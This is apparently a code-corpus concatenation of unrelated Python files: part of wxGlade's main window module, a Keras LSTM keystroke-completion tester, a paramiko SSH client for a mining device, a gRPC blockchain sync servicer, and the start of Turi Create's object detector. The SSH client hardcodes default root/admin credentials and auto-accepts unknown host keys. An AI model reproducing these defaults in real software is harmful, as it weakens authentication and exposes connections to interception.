#common.property_panel.Raise()
if hasattr(self, 'file_history') and filename is not None and add_to_history and \
(not common.root.is_template):
self.file_history.AddFileToHistory(misc.wxstr(filename))
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
duration = end - start
if filename:
self.user_message( _("Loaded %s in %.2f seconds") % (misc.wxstr(os.path.basename(filename)), duration) )
else:
self.user_message( _("Loaded in %.2f seconds") % duration )
return True
def save_app(self, event=None):
"saves a wxGlade project onto an xml file"
np.flush_current_property()
if not common.root.filename or common.root.is_template:
self.save_app_as()
else:
# check whether we are saving a template
ext = os.path.splitext(common.root.filename)[1].lower()
if ext == ".wgt":
common.root.is_template = True
self._save_app(common.root.filename)
def _save_app(self, filename):
try:
obuffer = []
common.root.write(obuffer)
common.save_file(filename, obuffer, 'wxg')
except EnvironmentError as inst:
if config.debugging: raise
common.root.saved = False
bugdialog.ShowEnvironmentError(_('Saving this project failed'), inst)
except Exception as inst:
if config.debugging: raise
common.root.saved = False
fn = os.path.basename(filename).encode('ascii', 'replace')
bugdialog.Show(_('Save File "%s"') % fn, inst)
else:
common.root.saved = True
common.remove_autosaved()
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
self.user_message( _("Saved %s") % os.path.basename(filename) )
def save_app_as(self):
"saves a wxGlade project onto an xml file chosen by the user"
if common.root.filename:
default_path, default_filename = os.path.split(common.root.filename)
else:
default_path, default_filename = self.cur_dir, "wxglade.wxg"
fn = wx.FileSelector( _("Save project as..."),
wildcard="wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt) |*.wgt|"
"XML files (*.xml)|*.xml|All files|*",
flags=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_path=default_path,
default_filename=default_filename)
if not fn: return
# check for file extension and add default extension if missing
ext = os.path.splitext(fn)[1].lower()
if not ext:
fn = "%s.wxg" % fn
common.root.filename = fn
#remove the template flag so we can save the file.
common.root.properties["is_template"].set(False)
self.save_app()
self.cur_dir = os.path.dirname(fn)
self.file_history.AddFileToHistory(fn)
def save_app_as_template(self):
"save a wxGlade project as a template"
data = getattr(common.root, 'template_data', None)
outfile, data = template.save_template(data)
if outfile:
common.root.properties["is_template"].set(True)
common.root.template_data = data
self._save_app(outfile)
def on_close(self, event):
if not event.CanVeto():
event.Skip()
return
if self.ask_save():
# close application
# first, let's see if we have to save the geometry...
prefs = config.preferences
if prefs.remember_geometry:
self._store_layout()
prefs.set_dict("layout", self.layout_settings)
prefs.changed = True
common.root.clear()
common.root.new()
try:
common.save_preferences()
except Exception as e:
wx.MessageBox( _('Error saving preferences:\n%s') % e,
_('Error'), wx.OK|wx.CENTRE|wx.ICON_ERROR )
self.Destroy()
common.remove_autosaved()
wx.CallAfter(wx.GetApp().ExitMainLoop)
elif event.CanVeto():
event.Veto()
def show_about_box(self):
"show the about dialog; see: about.wxGladeAboutBox"
about_box = about.wxGladeAboutBox()
about_box.ShowModal()
about_box.Destroy()
def show_manual(self, event=None):
"Show the wxGlade user manual"
self._show_html(config.manual_file)
def show_bug_tracker(self):
self._show_html("https://github.com/wxGlade/wxGlade/issues")
def show_mailing_list(self):
self._show_html("https://sourceforge.net/p/wxglade/mailman/wxglade-general/")
def show_releases(self):
self._show_html("https://github.com/wxGlade/wxGlade/releases")
def _show_html(self, html_file):
"Open browser and show an HTML documentation"
if wx.Platform == "__WXMAC__":
os.system(r'open -a Safari.app "%s"' % html_file)
else:
import webbrowser, threading
# ALB 2004-08-15: why did this block the program????? (at least on linux - GTK)
def go():
webbrowser.open_new(html_file)
t = threading.Thread(target=go)
t.daemon = True
t.start()
def show_and_raise(self):
self.property_panel.Show() # self.GetMenuBar().IsChecked(self.PROPS_ID))
self.tree_panel.Show() # self.GetMenuBar().IsChecked(self.TREE_ID))
self.property_panel.Raise()
self.tree_panel.Raise()
self.Raise()
def hide_all(self):
self.tree_panel.Hide()
self.property_panel.Hide()
def import_xrc(self, infilename=None, ask_save=True):
import xrc2wxg
if ask_save and not self.ask_save():
return
if not infilename:
infilename = wx.FileSelector( _("Import file"), wildcard="XRC files (*.xrc)" "|*.xrc|All files|*",
flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=self.cur_dir)
if infilename:
ibuffer = []
try:
xrc2wxg.convert(infilename, ibuffer)
# Convert UTF-8 returned by xrc2wxg.convert() to Unicode
tmp = b"".join(ibuffer).decode('UTF-8')
ibuffer = ['%s\n'%line for line in tmp.split('\n')]
self._open_app(ibuffer)
common.root.saved = False
except Exception as inst:
fn = os.path.basename(infilename).encode('ascii', 'replace')
bugdialog.Show(_('Import File "%s"') % fn, inst)
def manage_templates(self):
to_edit = template.manage_templates()
if to_edit is not None and self.ask_save():
# edit the template
# TODO, you still need to save it manually...
self._open_app(to_edit, add_to_history=False)
wx.MessageBox( _("To save the changes to the template, edit the GUI as usual,\n"
"and then click File->Save As Template..."),
_("Information"), style=wx.OK|wx.ICON_INFORMATION )
####################################################################################################################
# user interface helpers
def _set_icon(self):
icon = compat.wx_EmptyIcon()
bmp = wx.Bitmap( os.path.join(config.icons_path, "icon.png") )
icon.CopyFromBitmap(bmp)
self.SetIcon(icon)
def init_layout_settings(self):
# either load from file or init with defaults
display_area = wx.Display(0).ClientArea
default_pos = display_area.TopLeft
height = display_area.height
width = 800
default_size = (width,height)
self.layout_settings = {}
self.layout_settings["layout"] = 0
self.layout_settings["sash_positions"] = [[400, 380 ], # 0: palette and properties left; tree right
[height//2,400 ], # 1: palette and tree top; properties bottom
[2*height//3,height//3] ] # 2: all on top of each other
self.layout_settings["widths"] = [width,500] # for layouts 0/1 and 2
self.layout_settings["height"] = height
self.layout_settings["x"], self.layout_settings["y"] = default_pos
if not config.preferences.remember_geometry:
return default_pos, default_size, 0
# read from preferences
try:
layout = config.preferences.get_int("layout", "layout")
x = config.preferences.get_int("layout", "x")
y = config.preferences.get_int("layout", "y")
widths = [config.preferences.get_int("layout", "widths_l0"),
config.preferences.get_int("layout", "widths_l1")]
width = widths[0] if layout<2 else widths[1]
height = config.preferences.get_int("layout", "height")
sash_positions = [[config.preferences.get_int("layout", "sash_positions_l0_l0"),
config.preferences.get_int("layout", "sash_positions_l0_l1")],
[config.preferences.get_int("layout", "sash_positions_l1_l0"),
config.preferences.get_int("layout", "sash_positions_l1_l1")],
[config.preferences.get_int("layout", "sash_positions_l2_l0"),
config.preferences.get_int("layout", "sash_positions_l2_l1")]]
except:
return default_pos, default_size, 0
if layout<0 or layout>2 or not self._check_geometry(x, y, width, height):
return default_pos, default_size, 0
self.layout_settings["height"] = height
self.layout_settings["sash_positions"] = sash_positions
self.layout_settings["widths"] = widths
return (x,y), (widths[0],height), layout # return widths[0] as 0 is the initial setting
def switch_layout(self, new_layout, initial=False):
if new_layout != self.layout_settings["layout"]:
# set the splitters
if not initial: self._store_layout()
self.splitter2.Unsplit()
self.splitter1.Unsplit()
if new_layout==0:
self.property_panel.Reparent(self.splitter2)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter1)
self.splitter1.SplitVertically(self.splitter2, self.tree)
self.splitter2.SplitHorizontally(self.palette, self.property_panel)
elif new_layout==1:
self.property_panel.Reparent(self.splitter1)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter2)
self.splitter1.SplitHorizontally(self.splitter2, self.property_panel)
self.splitter2.SplitVertically(self.palette, self.tree)
elif new_layout==2:
self.property_panel.Reparent(self.splitter1)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter2)
self.splitter1.SplitHorizontally(self.splitter2, self.property_panel)
self.splitter2.SplitHorizontally(self.palette, self.tree)
if self.layout_settings["layout"] in (0,1) and new_layout==2:
self.SetSize( (self.layout_settings["widths"][1], self.GetSize()[1]) )
elif self.layout_settings["layout"]==2 and new_layout in (0,1):
self.SetSize( (self.layout_settings["widths"][0], self.GetSize()[1]) )
self.layout_settings["layout"] = new_layout
# display in toolbar
t = self._layout_tools[new_layout]
if not t.IsToggled(): t.Toggle()
self.toolbar.Realize()
# set splitter sash positions
if new_layout==0:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0)
elif new_layout==1:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0.5)
elif new_layout==2:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0.5)
positions = self.layout_settings["sash_positions"][new_layout]
self.splitter1.SetSashPosition( positions[0] )
self.splitter2.SetSashPosition( positions[1] )
def _store_layout(self):
# store position, size and splitter sash positions
self.layout_settings["x"], self.layout_settings["y"] = self.GetPosition()
layout = self.layout_settings["layout"]
self.layout_settings["sash_positions"][layout] = [self.splitter1.GetSashPosition(),
self.splitter2.GetSashPosition()]
width, height = self.GetSize()
if layout in (0,1):
self.layout_settings["widths"][0] = width
else:
self.layout_settings["widths"][1] = width
self.layout_settings["height"] = height
def _check_geometry(self, x,y,width,height):
# check whether a significant part would be visible
# also, at least a part of the top edge needs to be visible
if width<150 or height<150: return False
# check top line
top_line = wx.Rect(x,y,width,1)
min_visible = int(round(width/3))
top_line_OK = False
for d in range(wx.Display.GetCount()):
display = wx.Display(d)
client_area = display.ClientArea
if not client_area.width or not client_area.height:
# the display info is broken on some installations
continue
intersection = client_area.Intersect(top_line)
if intersection.width>=min_visible:
top_line_OK = True
break
if not top_line_OK: return False
# check rectangle
geometry = wx.Rect(x,y,width,height)
for d in range(wx.Display.GetCount()):
display = wx.Display(d)
client_area = display.ClientArea
if not client_area.width or not client_area.height:
# the display info is broken on some installations
continue
intersection = client_area.Intersect(geometry)
if intersection.width>150 and intersection.height>150 or geometry.width==-1 or geometry.height==-1:
return True
return False
class wxGlade(wx.App):
"""wxGlade application class
_exception_orig: Reference to original implementation of logging.exception()"""
def OnInit(self):
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# replace text based exception handler by a graphical exception dialog
sys.excepthook = self.graphical_exception_handler
# use graphical implementation to show caught exceptions
self._exception_orig = logging.exception # Reference to original implementation of logging.exception()
logging.exception = self.exception
# needed for wx >= 2.3.4 to disable wxPyAssertionError exceptions
if not config.debugging:
self.SetAssertMode(0)
common.init_preferences()
self.locale = wx.Locale(wx.LANGUAGE_DEFAULT) # avoid PyAssertionErrors
#compat.wx_ArtProviderPush(wxGladeArtProvider())
frame = wxGladeFrame()
self.SetTopWindow(frame)
self.SetExitOnFrameDelete(True)
self.init_idle()
if config.inform_screen_reader:
message = ("It seems you have a screen reader software installed.\n"
"Please be aware that there are some options to improve wxGlade accessibility\n"
"with screen readers.\n"
"See menu Edit -> Preferences -> Accessibility.")
wx.CallLater(1000, wx.MessageBox, message, "Accessibility Info")
return True
def OnExit(self):
"Restore original exception handler and logging.exception() on exit"
sys.excepthook = sys.__excepthook__
logging.exception = self._exception_orig
return 0
def init_idle(self):
if wx.Platform == "__WXMAC__" and compat.IS_CLASSIC:
# it seems that EVT_IDLE makes wx.CallAfter stall from time to time, so we use a timer
wx.CallLater(200, self.OnIdle)
else:
self.Bind(wx.EVT_IDLE, self.OnIdle)
def OnIdle(self, event=None):
"Idle tasks - currently show error messages only; see: show_msgdialog()"
try:
self.show_msgdialog()
finally:
if wx.Platform == "__WXMAC__" and compat.IS_CLASSIC:
wx.CallLater(200, self.OnIdle)
def show_msgdialog(self):
"""
Check for log messages and show them
see: main.wxGlade.OnIdle(), log.getBufferAsList(), msgdialog.MessageDialog"""
log_msg = log.getBufferAsString()
if not log_msg:
return
# initialise message dialog
msg_dialog = msgdialog.MessageDialog(None, -1, "")
msg_dialog.msg_list.InsertColumn(0, "")
# clear dialog and show new messages
msg_dialog.msg_list.Freeze()
msg_dialog.msg_list.DeleteAllItems()
for line in log_msg.split('\n'):
msg_dialog.msg_list.Append([line, ])
msg_dialog.msg_list.SetColumnWidth(0, -1)
msg_dialog.msg_list.Thaw()
msg_dialog.ShowModal()
msg_dialog.Destroy()
def graphical_exception_handler(self, exc_type, exc_value, exc_tb):
"""Show detailed information about uncaught exceptions in bugdialog.BugReport.
The shown exception will be logged to the log file in parallel.
The exception information will be cleared after the bug dialog has closed.
exc_type: Type of the exception (normally a class object)
exc_value: The "value" of the exception
exc_tb: Call stack of the exception
see: bugdialog.BugReport(), bugdialog.Show()"""
bugdialog.ShowEI(exc_type, exc_value, exc_tb)
if compat.PYTHON2: sys.exc_clear()
def exception(self, msg, *args, **kwargs):
"""Graphical replacement of logging.exception().
All exception details logged with logging.exception() will be shown in bugdialog.BugReport.
The shown exception will be logged to the log file in parallel.
The exception information will be cleared after the bug dialog has closed.
msg: Short description of the exception
see: bugdialog.BugReport, bugdialog.ShowEI()"""
if args:
try:
msg = msg % args
except TypeError:
log.exception_orig(_('Wrong format of a log message'))
(exc_type, exc_value, exc_tb) = sys.exc_info()
bugdialog.ShowEI(exc_type, exc_value, exc_tb, msg)
if compat.PYTHON2: sys.exc_clear()
def main(filename=None):
"if filename is not None, loads it"
logging.info(_("Using wxPython %s"), config.wx_version)
common.history = history.History()
app = wxGlade()
if filename is not None:
win = app.GetTopWindow()
if os.path.splitext(filename)[1].upper() == ".XRC":
win.import_xrc(filename)
else:
win._open_app(filename, False)
# mainly for debugging we want the first window to be opened already
if filename and config.open_design_window and common.root.children:
editor = common.root.children[0]
misc.set_focused_widget(editor)
editor.create()
common.app_tree.ExpandAllChildren(editor.item)
win.cur_dir = os.path.dirname(filename)
#win = app.GetTopWindow()
##win.import_xrc(r"D:\Python\Sources35\wxglade\wxglade_dev\tests\casefiles\CalendarCtrl.xrc")
#win.import_xrc(r"D:\Python\Sources35\wxglade\wxglade_dev\tests\casefiles\AllWidgets_30.xrc")
app.MainLoop()
|
lstm_tester.py
|
from __future__ import print_function
from keras.utils.data_utils import get_file
import io
import numpy as np
from keras.models import load_model
import pickle
import heapq
import cv2
from threading import Thread
letter_list = ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e',
'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e']
letter_string = ""
predictions = []
def sample(preds, top_n=3):
preds = np.asarray(preds).astype('float64')
preds = np.log(preds)
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
return heapq.nlargest(top_n, range(len(preds)), preds.take)
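# sample() returns the indices of the top_n most probable characters: heapq.nlargest ranks the
# indices in range(len(preds)) by preds.take, i.e. by their probability. Note that np.log
# followed immediately by np.exp cancels out, so preds is only re-normalised here; the
# temperature scaling used in the standard Keras text-generation example appears to have been dropped.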
def prepare_input(text):
x = np.zeros((1, len(text), len(chars)))
for t, char in enumerate(text):
x[0, t, char_indices[char]] = 1.
return x
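# prepare_input() returns a one-hot tensor of shape (1, len(text), len(chars)); for the
# 40-character windows used below that is (1, 40, number of unique characters).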
def predict_completion(text):
original_text = text
completion = ''
while True:
x = prepare_input(text)
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, top_n=1)[0]
next_char = indices_char[next_index]
text = text[1:] + next_char
completion += next_char
if len(original_text + completion) + 2 > len(original_text) and next_char == ' ':
return completion
def thread_pred():
while True:
if len(letter_string) == 40:
predict_completions(letter_string, 3)
print()
def predict_completions(text, n=3):
if len(text) == 40:
x = prepare_input(text)
preds = model.predict(x, verbose=0)[0]
next_indices = sample(preds, n)
print([indices_char[idx] + predict_completion(text[1:] + indices_char[idx]) for idx in next_indices])
#path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')
path = 'mi_ro.txt'
with io.open(path, encoding='utf-8') as f:
text = f.read().lower()
print('corpus length:', len(text))
chars = sorted(list(set(text)))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
print('unique chars: ', len(chars))
SEQUENCE_LENGTH = 40
step = 3
sentences = []
next_chars = []
for i in range(0, len(text) - SEQUENCE_LENGTH, step):
sentences.append(text[i: i + SEQUENCE_LENGTH])
next_chars.append(text[i + SEQUENCE_LENGTH])
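# Each training example is a SEQUENCE_LENGTH (40) character window of the corpus, advancing by
# `step` (3) characters; the prediction target is the single character that follows the window.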
print('num training examples: ', len(sentences))
X = np.zeros((len(sentences), SEQUENCE_LENGTH, len(chars)), dtype=bool)
y = np.zeros((len(sentences), len(chars)), dtype=bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char_indices[char]] = 1
y[i, char_indices[next_chars[i]]] = 1
model = load_model('ro_keras_model.h5')
#history = pickle.load(open("history.p", "rb"))
prepare_input("This is an example of input for our LSTM".lower())
quotes = [
"It is not a lack of love, but a lack of friendship that makes unhappy marriages.",
]
for q in quotes:
seq = q[:40].lower()
print(seq)
predict_completions(seq, 5)
print()
# let = ''.join(letter_list)
# test=let.lower()
# print(let.lower())
# print(len(let))
# predict_completions(test,3)
# print()
words_thread = Thread(target=thread_pred, args=())
words_thread.start()
cap = cv2.VideoCapture(0)
while True:
ret, img = cap.read()
cv2.imshow("fr", img)
key = cv2.waitKey(1)
if key != -1:
letter_list.pop(0)
letter_list.append(chr(key))
letter_string = ''.join(letter_list)
letter_string = letter_string.lower()
|
ssh.py
|
'''ssh client
use with, or finally close
See
https://daanlenaerts.com/blog/2016/07/01/python-and-ssh-paramiko-shell/
https://stackoverflow.com/questions/39606573/unable-to-kill-python-script
'''
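# Note: as written, this class does not implement __enter__/__exit__, so "use with" above means
# wrapping calls in try/finally rather than using it as a real context manager; see the
# illustrative example at the end of this file.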
import threading
import paramiko
class Ssh:
'''communicate with miner through ssh'''
shell = None
client = None
transport = None
closed = False
strdata = ''
alldata = ''
def __init__(self, address, username='root', password='admin', port=22):
print("Connecting to server on ip {0}:{1}".format(address, port))
self.client = paramiko.client.SSHClient()
self.client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
self.client.connect(address, port=port, username=username, password=password, look_for_keys=False)
print("Connection created")
self.thread = threading.Thread(target=self.process)
self.thread.start()
def exec_command(self, command):
'''use this if you only need to run ONE command
This is the preferred way to communicate with miner
returns a list of lines as the response to the command
'''
_, stdout_, _ = self.client.exec_command(command)
#this will make it block until response is received
stdout_.channel.recv_exit_status()
return stdout_.readlines()
    def close_connection(self):
        '''close the ssh connection'''
        # Signal the background process() loop to stop before joining it;
        # otherwise the join below always runs into its 10 second timeout.
        self.closed = True
        self.thread.join(timeout=10)
        if self.client is not None:
            self.client.close()
        if self.transport is not None:
            self.transport.close()
def open_shell(self):
'''open shell command to run a series of command
try to avoid if possible
may have some async/threading issues
'''
self.shell = self.client.invoke_shell()
def send_shell(self, command):
'''send command to shell'''
if self.shell:
self.shell.send(command + "\n")
else:
print("Shell not opened.")
def process(self):
        '''read and print any pending shell output until the connection is closed'''
while self.closed is False:
# Print data when available
            if self.shell is not None and self.shell.recv_ready():
alldata = self.shell.recv(1024)
while self.shell.recv_ready():
alldata += self.shell.recv(1024)
strdata = str(alldata, "utf8")
                strdata = strdata.replace('\r', '')
print(strdata, end="")
if strdata.endswith("$ "):
print("\n$ ", end="")
print("ssh process closed")
def get(self, remotefile, localfile):
ftp_client = self.client.open_sftp()
ftp_client.get(remotefile, localfile)
ftp_client.close()
def put(self, localfile, remotefile):
ftp_client = self.client.open_sftp()
ftp_client.put(localfile, remotefile)
ftp_client.close()
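# Minimal usage sketch (the host address and command below are placeholders,
# not part of the original module); run this file directly to try it:
if __name__ == '__main__':
    ssh = Ssh('192.168.1.10', username='root', password='admin')
    try:
        for line in ssh.exec_command('uname -a'):
            print(line, end='')
    finally:
        ssh.close_connection()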
|
synchronization.py
|
#coding:utf-8
from p2ptest.proto import grpc_pb2
from p2ptest.proto import grpc_pb2_grpc
import p2ptest.block as block
from p2ptest.enum.enum import *
import threading
import time
import re
_compiNum = re.compile(r"^\d+$")  # matches all-digit strings (height lookups)
_compiW = re.compile(r"^\w{64}")  # matches 64-character block hashes
class Synchronization(grpc_pb2.SynchronizationServicer):
    def From(self, request, context):
        # => request (a block height or a block hash)
        # <= the matching block
        global _compiNum
        print("=> [From]Info:%s" % str(request.value))
        print("<= [From]Block:%s" % str(request.value))
        try:
            if _compiNum.search(request.value) is not None:
                return block.block.Chain.getBlockFromHeight(int(request.value)).pb2
            elif _compiW.search(request.value) is not None:
                return block.block.Chain.getBlockFromHash(request.value).pb2
        except Exception as e:
            print(e)
            raise Exception("So Fast, Wait..., Don't Close")
    def To(self, request, context):
        # => a block
        # <= SYNCHRONIZATION if the chain height increased, otherwise NOT_SYNCHRONIZATION
        # Note: inside a class body, __BranchTarget is name-mangled to
        # _Synchronization__BranchTarget, so this global statement does not
        # rebind the module-level __BranchTarget defined below.
        global __BranchTarget, flag
        b = block.block.Block()
        b.pb2 = request
        print("=> [To] Block:%s" % b.pb2.blockhash)
        status = block.block.Chain.addBlock(b.pb2.blockhash, b)
        print("<= [To] Response:%sSYNCHRONIZATION" % ("" if "HEIGHT_ADD" == status else "NOT_"))
        if "HEIGHT_ADD" == status:
            flag = False
            __BranchTarget = ""
            return grpc_pb2.Message(value = "SYNCHRONIZATION")
        return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
    # before simplification:
    # if "DIFFERENT_TREE" == status:
    #     return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
    # if "SYNC_STATUS" == status:
    #     return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
    # return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
__BranchTarget = ""
flag = False
def setBranchTarget(hashvalue):
global flag,__BranchTarget
__BranchTarget,flag = hashvalue,True
print("Status => Sync")
threading.Thread(target = unlock).start()
def unlock():
global flag,__BranchTarget
    time.sleep(600)
__BranchTarget,flag = "",False
def Task(stub,task,message):
return stub.From(message) if task == FROM else stub.To(message)
# equivalent to:
# if task == FROM:
#     return stub.From(message)
# elif task == TO:
#     return stub.To(message)
|
object_detector.py
|
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Class definition and utilities for the object detection toolkit.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import time as _time
import itertools as _itertools
from datetime import datetime as _datetime
import six as _six
import turicreate as _tc
import numpy as _np
from threading import Thread as _Thread
from six.moves.queue import Queue as _Queue
from turicreate.toolkits._model import CustomModel as _CustomModel
import turicreate.toolkits._internal_utils as _tkutl
from turicreate.toolkits import _coreml_utils
from turicreate.toolkits._model import PythonProxy as _PythonProxy
from turicreate.toolkits._internal_utils import (_raise_error_if_not_sframe,
_numeric_param_check_range)
from turicreate import config as _tc_config
from turicreate.toolkits._main import ToolkitError as _ToolkitError
from .. import _pre_trained_models
from ._evaluation import average_precision as _average_precision
from .._mps_utils import (use_mps as _use_mps,
mps_device_memory_limit as _mps_device_memory_limit,
MpsGraphAPI as _MpsGraphAPI,
MpsGraphNetworkType as _MpsGraphNetworkType,
MpsGraphMode as _MpsGraphMode,
mps_to_mxnet as _mps_to_mxnet,
mxnet_to_mps as _mxnet_to_mps)
_MXNET_MODEL_FILENAME = "mxnet_model.params"
def _get_mps_od_net(input_image_shape, batch_size, output_size, anchors,
config, weights={}):
"""
Initializes an MpsGraphAPI for object detection.
"""
network = _MpsGraphAPI(network_id=_MpsGraphNetworkType.kODGraphNet)
c_in, h_in, w_in = input_image_shape
c_out = output_size
h_out = h_in // 32
w_out = w_in // 32
c_view = c_in
h_view = h_in
w_view = w_in
network.init(batch_size, c_in, h_in, w_in, c_out, h_out, w_out,
weights=weights, config=config)
return network
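# For example (assuming the default 13x13 grid and a stride-32 backbone used
# elsewhere in this module), a 3 x 416 x 416 input yields a 13 x 13 output
# grid, since 416 // 32 == 13.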
# Standard lib functions would be great here, but the formatting options of
# timedelta are not great
def _seconds_as_string(seconds):
"""
Returns seconds as a human-friendly string, e.g. '1d 4h 47m 41s'
"""
TIME_UNITS = [('s', 60), ('m', 60), ('h', 24), ('d', None)]
unit_strings = []
cur = max(int(seconds), 1)
for suffix, size in TIME_UNITS:
if size is not None:
cur, rest = divmod(cur, size)
else:
rest = cur
if rest > 0:
unit_strings.insert(0, '%d%s' % (rest, suffix))
return ' '.join(unit_strings)
def _raise_error_if_not_detection_sframe(dataset, feature, annotations, require_annotations):
    _raise_error_if_not_sframe(dataset, 'dataset')
if feature not in dataset.column_names():
raise _ToolkitError("Feature column '%s' does not exist" % feature)
if dataset[feature].dtype != _tc.Image:
raise _ToolkitError("Feature column must contain images")
if require_annotations:
if annotations not in dataset.column_names():
raise _ToolkitError("Annotations column '%s' does not exist" % annotations)
if dataset[annotations].dtype not in [list, dict]:
raise _ToolkitError("Annotations column must be of type dict or list")
def create(dataset, annotations=None, feature=None, model='darknet-yolo',
classes=None, batch_size=0, max_iterations=0, verbose=True,
**kwargs):
"""
Create a :class:`ObjectDetector` model.
Parameters
----------
dataset : SFrame
Input data. The columns named by the ``feature`` and ``annotations``
parameters will be extracted for training the detector.
annotations : string
Name of the column containing the object detection annotations. This
column should be a list of dictionaries (or a single dictionary), with
each dictionary representing a bounding box of an object instance. Here
is an example of the annotations for a single image with two object
instances::
[{'label': 'dog',
'type': 'rectangle',
'coordinates': {'x': 223, 'y': 198,
'width': 130, 'height': 230}},
{'label': 'cat',
'type': 'rectangle',
'coordinates': {'x': 40, 'y': 73,
'width': 80, 'height': 123}}]
The value for `x` is the horizontal center of the box paired with
`width` and `y` is the vertical center of the box paired with `height`.
'None' (the default) indicates the only list column in `dataset` should
be used for the annotations.
feature : string
Name of the column containing the input images. 'None' (the default)
indicates the only image column in `dataset` should be used as the
feature.
    model : string, optional
Object detection model to use:
- "darknet-yolo" : Fast and medium-sized model
    classes : list, optional
List of strings containing the names of the classes of objects.
Inferred from the data if not provided.
batch_size: int
The number of images per training iteration. If 0, then it will be
automatically determined based on resource availability.
max_iterations : int
The number of training iterations. If 0, then it will be automatically
be determined based on the amount of data you provide.
verbose : bool, optional
If True, print progress updates and model details.
Returns
-------
out : ObjectDetector
A trained :class:`ObjectDetector` model.
See Also
--------
ObjectDetector
Examples
--------
.. sourcecode:: python
# Train an object detector model
>>> model = turicreate.object_detector.create(data)
        # Make predictions on the training set and add them as a column to the SFrame
>>> data['predictions'] = model.predict(data)
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_raise_error_if_not_sframe(dataset, "dataset")
from ._mx_detector import YOLOLoss as _YOLOLoss
from ._model import tiny_darknet as _tiny_darknet
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._manual_scheduler import ManualScheduler as _ManualScheduler
import mxnet as _mx
from .._mxnet import _mxnet_utils
if len(dataset) == 0:
raise _ToolkitError('Unable to train on empty dataset')
_numeric_param_check_range('max_iterations', max_iterations, 0, _six.MAXSIZE)
start_time = _time.time()
supported_detectors = ['darknet-yolo']
if feature is None:
feature = _tkutl._find_only_image_column(dataset)
if verbose:
print("Using '%s' as feature column" % feature)
if annotations is None:
annotations = _tkutl._find_only_column_of_type(dataset,
target_type=[list, dict],
type_name='list',
col_name='annotations')
if verbose:
print("Using '%s' as annotations column" % annotations)
_raise_error_if_not_detection_sframe(dataset, feature, annotations,
require_annotations=True)
is_annotations_list = dataset[annotations].dtype == list
_tkutl._check_categorical_option_type('model', model,
supported_detectors)
base_model = model.split('-', 1)[0]
ref_model = _pre_trained_models.OBJECT_DETECTION_BASE_MODELS[base_model]()
params = {
'anchors': [
(1.0, 2.0), (1.0, 1.0), (2.0, 1.0),
(2.0, 4.0), (2.0, 2.0), (4.0, 2.0),
(4.0, 8.0), (4.0, 4.0), (8.0, 4.0),
(8.0, 16.0), (8.0, 8.0), (16.0, 8.0),
(16.0, 32.0), (16.0, 16.0), (32.0, 16.0),
],
'grid_shape': [13, 13],
'aug_resize': 0,
'aug_rand_crop': 0.9,
'aug_rand_pad': 0.9,
'aug_rand_gray': 0.0,
'aug_aspect_ratio': 1.25,
'aug_hue': 0.05,
'aug_brightness': 0.05,
'aug_saturation': 0.05,
'aug_contrast': 0.05,
'aug_horizontal_flip': True,
'aug_min_object_covered': 0,
'aug_min_eject_coverage': 0.5,
'aug_area_range': (.15, 2),
'aug_pca_noise': 0.0,
'aug_max_attempts': 20,
'aug_inter_method': 2,
'lmb_coord_xy': 10.0,
'lmb_coord_wh': 10.0,
'lmb_obj': 100.0,
'lmb_noobj': 5.0,
'lmb_class': 2.0,
'non_maximum_suppression_threshold': 0.45,
'rescore': True,
'clip_gradients': 0.025,
'weight_decay': 0.0005,
'sgd_momentum': 0.9,
'learning_rate': 1.0e-3,
'shuffle': True,
'mps_loss_mult': 8,
# This large buffer size (8 batches) is an attempt to mitigate against
# the SFrame shuffle operation that can occur after each epoch.
'io_thread_buffer_size': 8,
}
if '_advanced_parameters' in kwargs:
# Make sure no additional parameters are provided
new_keys = set(kwargs['_advanced_parameters'].keys())
set_keys = set(params.keys())
unsupported = new_keys - set_keys
if unsupported:
raise _ToolkitError('Unknown advanced parameters: {}'.format(unsupported))
params.update(kwargs['_advanced_parameters'])
anchors = params['anchors']
num_anchors = len(anchors)
if batch_size < 1:
batch_size = 32 # Default if not user-specified
cuda_gpus = _mxnet_utils.get_gpus_in_use(max_devices=batch_size)
num_mxnet_gpus = len(cuda_gpus)
use_mps = _use_mps() and num_mxnet_gpus == 0
